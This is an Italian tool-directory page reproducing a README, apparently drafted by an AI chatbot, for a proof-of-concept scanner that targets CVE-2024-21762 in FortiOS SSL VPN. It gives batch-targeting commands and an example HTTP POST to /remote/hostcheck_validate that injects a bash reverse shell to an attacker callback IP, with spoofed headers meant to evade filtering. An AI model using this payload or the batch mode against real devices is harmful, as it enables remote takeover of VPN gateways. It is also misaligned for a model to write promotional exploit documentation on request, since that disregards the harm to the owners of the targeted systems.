Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-21762_FortiNet_PoC — Scanner proof-of-concept mirato a CVE-2024-21762 nell'endpoint /remote/hostcheck_validate di FortiOS SSL VPN con consegna di payload reverse shell. | Kitploit
Strumenti/GitHubGitHub/abrewer251/cve-2024-21762_fortinet_poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubabrewer251/cve-2024-21762_fortinet_poc

CVE-2024-21762_FortiNet_PoC

Scanner proof-of-concept mirato a CVE-2024-21762 nell'endpoint /remote/hostcheck_validate di FortiOS SSL VPN con consegna di payload reverse shell.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
2121 anno faNon ancora revisionato
Condividi

CVE-2024-21762_FortiNet_PoC

Scanner proof-of-concept che ha come target CVE-2024-21762 nell'endpoint /remote/hostcheck_validate di FortiOS SSL VPN con invio di payload reverse shell.

Ecco un writeup in stile GitHub per il tuo progetto, che include un riepilogo chiaro e conciso, una guida all'uso e il contesto su come si inserisce nella CVE.


🔥 Titolo del Progetto: CVE-2024-21762 FortiOS HostCheck PoC Scanner

🧠 Riepilogo (per la riga di descrizione di GitHub):

Scanner proof-of-concept che ha come target CVE-2024-21762 nell'endpoint /remote/hostcheck_validate di FortiOS SSL VPN con invio di payload reverse shell.


📜 Panoramica

Questo script Python è uno strumento PoC (Proof of Concept) progettato per interagire con l'interfaccia SSL VPN di Fortinet FortiOS, mirando a CVE-2024-21762 — una vulnerabilità di buffer overflow basato su stack o command injection nell'endpoint /remote/hostcheck_validate.

Disclaimer: Questo è solo per scopi educativi e di test autorizzati.


🧬 Come Funziona

  • Invia una richiesta POST costruita ad /remote/hostcheck_validate su un'interfaccia SSL VPN FortiGate.
  • Inietta un payload reverse shell bash in un parametro vulnerabile simulato (host).
  • Usa header spoofati (User-Agent, Cookie) per bypassare il filtraggio superficiale delle richieste FortiOS.
  • Riceve e registra le risposte del server per valutare il successo dello sfruttamento.
  • Supporta test su singolo o batch di target con automazione di file input/output e barre di progresso.

🛠️ Caratteristiche

  • 🧪 Iniezione di payload reverse shell tramite campo form controllato
  • 🧾 Cattura completa della risposta HTTP per l'analisi (last_response.txt)
  • 📊 Barra di progresso per il monitoraggio in modalità singola/batch
  • 🗃️ Modalità batch con supporto di file input/output
  • 🔄 Modulare ed estendibile

⚙️ Requisiti

  • Python 3.6+
  • tqdm per la visualizzazione del progresso

Installa le dipendenze:

root@kitploit:~
pip install tqdm

🚀 Utilizzo

Modalità Singolo Target

root@kitploit:~
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080

Modalità Batch

root@kitploit:~
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
  • targets.txt: Elenco di target in formato IP:PORT, uno per riga
  • results.txt: Log di output dei tentativi di exploit

📥 Esempio di Payload Inviato

root@kitploit:~
POST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded

host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...

🔍 Log

Lo strumento scrive la risposta HTTP completa di ogni tentativo in:

root@kitploit:~
last_response.txt

Usalo per verificare se la richiesta è stata analizzata, rifiutata o se è stato restituito un codice di errore.


⚠️ Aspetti Legali

Questo codice è fornito solo per scopi educativi e di test autorizzati. Non utilizzarlo su reti o sistemi di cui non possiedi o non hai il permesso esplicito di testare.


✍️ Autore

Carter — Ingegnere della Sicurezza Informatica, appassionato di Red/Purple Team, nerd dell'automazione PoC.


Vuoi che questo venga impacchettato in un file README.md + struttura del repo pronti per essere inviati su GitHub? Posso generarlo dopo.

Scarica lo strumento